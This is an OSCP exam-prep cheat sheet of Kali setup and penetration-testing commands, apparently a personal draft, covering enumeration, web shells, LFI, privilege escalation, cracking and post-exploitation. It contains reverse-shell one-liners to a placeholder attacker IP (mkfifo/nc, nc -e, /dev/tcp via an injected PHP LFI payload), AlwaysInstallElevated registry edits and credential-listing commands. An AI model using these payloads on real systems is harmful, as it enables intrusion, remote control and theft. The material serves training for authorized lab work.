 ___  __  ___ _ __     ___| |__   ___  __ _| |_   ___| |__   ___  ___| |_ 
 / _ \/ __|/ __| '_ \   / __| '_ \ / _ \/ _` | __| / __| '_ \ / _ \/ _ \ __|
| (_) \__ \ (__| |_) | | (__| | | |  __/ (_| | |_  \__ \ | | |  __/  __/ |_ 
 \___/|___/\___| .__/   \___|_| |_|\___|\__,_|\__| |___/_| |_|\___|\___|\__|
               |_|

 _                 _                   _           
| |_ _ __ _   _   | |__   __ _ _ __ __| | ___ _ __ 
| __| '__| | | |  | '_ \ / _` | '__/ _` |/ _ \ '__|
| |_| |  | |_| |  | | | | (_| | | | (_| |  __/ |   
 \__|_|   \__, |  |_| |_|\__,_|_|  \__,_|\___|_|   
          |___/                                    

#remmeber most of these need root but I've not included SUDO because Kali doesn't feature this :)

##############################
#OSCP Cheat Sheet by Dan Card#
##############################
#Kali Setup & Command Reference
#DRAFT not tested

####################
# UPDATE KALI
###################
## ok so you probably want to run two vms for the pwk and maybe the exam one pwk vanilla 32 bit which is not updated and one 2018 KALI with the latest updates


apt-get update; apt-get upgrade


#############START POSTGRESQL on BOOT####################
sudo update-rc.d postgresql enable

##################################################
# SETUP VM TOOLS FOR SHARED FOLDERS AND COPY PASTA
##################################################

apt-get install openvmfstools
There are shell scripts to run to enable this

##############################
# Update Python
##############################
apt-get install python-dev
apt-get instal python-pip
apt-get install python2.7-dev
apt-get install python2.7-pip
apt-get install python3-dev
apt-get install python3-pip


#######################
#Install PIP modules
#######################

pip install netifaces

####################
#Terminal Management
# The PWK image already includes terminator
####################
#User terminator, Byobu.co and or TMUX

apt-get install terminator
apt-get install tmux
	apt-get install byobu


###############
# SETUP MSF
###############
#setup postgreSQL to start by default
update-rc.d postgresql enable
#rebuild search cache
msfdb init
msfdb status
msfconsole
db_status
db_connect msf:msf@127.0.0.1:5432/msf
db_rebuild_cache
db_status

#setup global variables in MSF
set GLHOST 10.10.10.10
set GLPORT 4444

############START POSTGRESQL on BOOT #############
systemctl enable ssh
systemctl enable postgresql

#########################
#SIMPLE PYTHON WEB SERVER
########################
python -m SimpleHTTPServer 80

#####################################
# Get all the tools into /pentest
#####################################
mkdir /pentest
mkdir /pentest/tools
mkdir /pentest/oscp
mkdir /pentest/htb

####################################
# ENUMERATION
#####################################
###find ip and arpy things
netdiscover -i eth0
#add things to host files if that's appropriate

#NMAP ALL THE THINGS

nmap -Pn -sS -sV -T4 -O -A -oA -v -v -v -v [targetname_tcpq] [targetIP/name]
nmap -Pn -sU -sV -T4 -O -A -oA -v -v -v -v [targetname_udpq] [targetIP/name]
nmap -Pn -p- -sS -sV -T4 -O -A -oA -v -v -v -v [targetname_tcpf] [targetIP/name]
nmap -Pn -p- -sU -sV -T4 -O -A -oA -v -v -v -v [targetname_tcpf] [targetIP/name]

nmap -Pn -p- -sV -T4 --script *vuln* 10.11.1.220

#check for SNMP
### check snmp public community string with version 1 (change as requred)
snmp-check [target_ip] -c public -v 1
#########if found walk it#############
snmpwalk -v 1 -c public [target ip]

#CHECK for TFTP (ala stuxnet)
nmap -sU -p 69 --script tftp-enum.nse [taretIP/name]

#################SMTP ENUMERATION######################

smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t 10.11.1.22


#####################################
# Web Application Enumeration Tools
#####################################
# run wafw00f to start with to check for application firewalls
# CMSMAP for scanning content management systems
# nikto for web application vulnerability scanning
# wpscan for wordpress
# joomscan for joomla

#curl the robots.txt file
curl http://[target_ip]/robots.txt


#forced browsing
#gobuster
#install
mkdir /pentest/
mkdir /pentest/tools
cd /pentest/tools
git clone https://github.com/OJ/gobuster.git

###########################WORDPRESS SCANNING#######################################
wpscan --url http://[target_ip] --enumerate p --enumerate u --enumerate t

#######################
### WEB SHELLS ########
#######################
##########PHP SHELLS################
#PHP BASH
cd /pentest/tools
#https://github.com/Arrexel/phpbash
git clone https://github.com/Arrexel/phpbash.git
#php-reverse-shell
http://pentestmonkey.net/tools/web-shells/php-reverse-shell

#PHP simple command shell

https://github.com/artyuum/Simple-PHP-Web-Shell/blob/master/index.php
#to launch a shell use
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.xx 666 >/tmp/f

#########################GOBUSTER######################
### gobuster general command structure for a lnux server running PHP connecting via a proxy
gobuster -u http://bank.htb -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html -p http://127.0.0.1:8080

######################################
######NETCAT shells on target
#######################################
nc [attacker_ip] 1234 -e /bin/sh

#################LISTENERS#################################

####a simple netcat listener on TCP 1234
nc -v -n -l -p 1234

### an msf listener
msfconsole

#what do you do if its BSD and doesn't have -e as an option!?

mknod /tmp/backpipe p 
/bin/sh 0</tmp/backpipe | nc [attacker_ip] 1234 1>/tmp/backpipe

#sweeeeet!

#####################
#GREP search file contents of a directory
#############################################
#search file contents using acase insensitive recusrive search
grep -rniw /pentest/HTB/bank/balance-transfer/bank.htb/balance-transfer/ -e 'success'



##############################WEB SERVER LFI##############################

#tools to help
#Kadimus
#https://github.com/P0cL4bs/Kadimus
#remember to install dependancies
./kadimus -t https://[target]/section.php?page=php://input%00 -C \ '<?php echo shell_exec("bash -i >& /dev/tcp/10.11.0.xxx/4444 0>&1 2>&1"); ?>' -X input


##########################WINDOWS PRIV ESC
#set msi's to install with admin rights
REG ADD HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
REG ADD HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1



###################LINUX ENUMERATION#################################
#ok so ideally use a tool such as linenum.sh however we need to know what to do manualy.
#so first thing is first let's see who I am?
whoami
#now let's check my hostname
hostname
#now let's see what OS version I'm running
uname -a # -a is important to get all
##################
cat /etc/os-release
lsb_release -a
hostnamectl

uname -r #kernel version

#now let's see what access i have
#######

#now let's see if I can run anything with elevated access
sudo -l

#######################################################################################
########################## POST EXPLOITATION ##########################################
#######################################################################################
#########WINDOWS POST EXPLOITATION##############
#rasta mouse has some scripts Sherlock and Watston (watson runs on .net 2.0) for searching for exploits for priv esc
https://github.com/rasta-mouse/Watson

###############################################
######### POWER SHELL TO THE RESCUE ###########
###############################################
#PowerShell One Liners
#run a local script file
PowerShell.exe -ExecutionPolicy UnRestricted -File .runme.ps1
#run a command block
PowerShell.exe -ExecutionPolicy UnRestricted invoke-command -scriptblock {Write-Host "Now I have a machine gun"}

#POST EXPLOITATION LIVING OFF THE LAND
#so go find useful system information
# check this link out --- https://www.cyberciti.biz/faq/how-to-check-os-version-in-linux-command-line/

hostname
whoami
ipconfig /all
route print
sytseminfo
qwinsta
schtasks
at

#--------------------look for credentials
cmdkey /list


#######################LINUX Remote Desktop #######################
#rdesktop has a wide range of options
#remote desktop with clipboard, screen name SLAVE and use 80% of the screen
rdesktop -u administrator -p "Pa55w0rd1" -r PRIMARYCLIPBOARD -T SLAVE -g 80% 10.11.1.221

#connect to the Windows 7 VM and mount the /tmp/ folder as a shared drive

rdesktop -u offsec -p Pa55w0rd1 -r disk:Temp=/tmp/ -T PWK-W7 -g 80% 10.11.16.xx


######### LINUX POST EXPLOITATION ##############
# on linux and unix systems BASH shell scripts can be useful after an initial shell has been achieved


#setup a python web server on attacker
#dowload LinEnum.sh from attacker to victim
wget http://10.11.0.xx/LinEnum.sh
#warning you might get acccess denied. if so try using the /tmp directory
#execute LinEnum.sh

#make this executable
chmod +x LinEnum.sh
./LinEnum.sh

#now we probably want to find some vulns as well

#https://github.com/belane/linux-soft-exploit-suggester
#https://github.com/mzet-/linux-exploit-suggester



###################### KERNEL EXPLOITS ################################
#Look at the suggested exploits in relation to kernerl exploits
#kernel exploits often require to be compiled
#if you can't compile on the victim compile them locally using gcc
# if you want to compile a 32 bit binary on x64 kali using "gcc -m 32"

# Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Local Privilege Escalation (1)
# https://www.exploit-db.com/exploits/8478/
# DIRTYC0W
# NELSON


#######################################################################################
#######################################################################################
################################## CRACKING ###########################################

#Crack a zip file using john (you may need to install jumbo version of john and use the exact path to run the john binary
# you need a word list either use rockyou or generate one using data you have (e.g. run strings, or ur cewl against a website etc.)
#first convert the zip file to john the ripper hash format using zip2john (use rar2john for rar files)
zip2john control.zip > ziphash
#next we need to run john and specify the format and the hash file and provide a wordlist
john --format=zip --wordlist=passwords.txt ziphash

#########################SHELL UPGRDES###########################
# if you have a limited shell on linux try this:
#PYTHON shell
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'

##################################ACTIVE DIRECTORY#################################
# if you ever need to use the gui to seach AD without tools installed use this:
%SystemRoot%\SYSTEM32\rundll32.exe dsquery,OpenQueryWindow


#ACTIVE DIRECTORY ENUMERATION
#RPCLIENT with NULL Session bind

#RID ENUMERATION
# get RID ENUM from trusted SEC - https://github.com/trustedsec/ridenum
git clone https://github.com/trustedsec/ridenum
# neeeds python-pexpect
#may needs creds is NULL sessions isn't enabled
python ridenum.py 10.11.1.220 500 50000

###DNS ENUMERATION
dnsrecon -d thinc.local -n 10.11.1.xx -D /usr/share/wordlists/subdomains-10000.txt -t std,srv,axfr -c /pentest/oscp/dns.csv


######################WEB TOOLS TO HELP YOU ON THE JOURNEY########################
#CYBER CHEF from GCHQ
https://gchq.github.io/CyberChef/

#The magic tool will analyse data and try and work out its format e.g. type/cat a zip file and copy it into the input
https://gchq.github.io/CyberChef/#recipe=Magic(3,false,false)


####################### Running BURP Suite when the target has a certificate issue#########################
#disable java SNI for when your target site doesn't appear in burp suite and its running TLS
java -Djsse.enableSNIExtension=false -jar  burpsuite_community_v1.7.36.jar

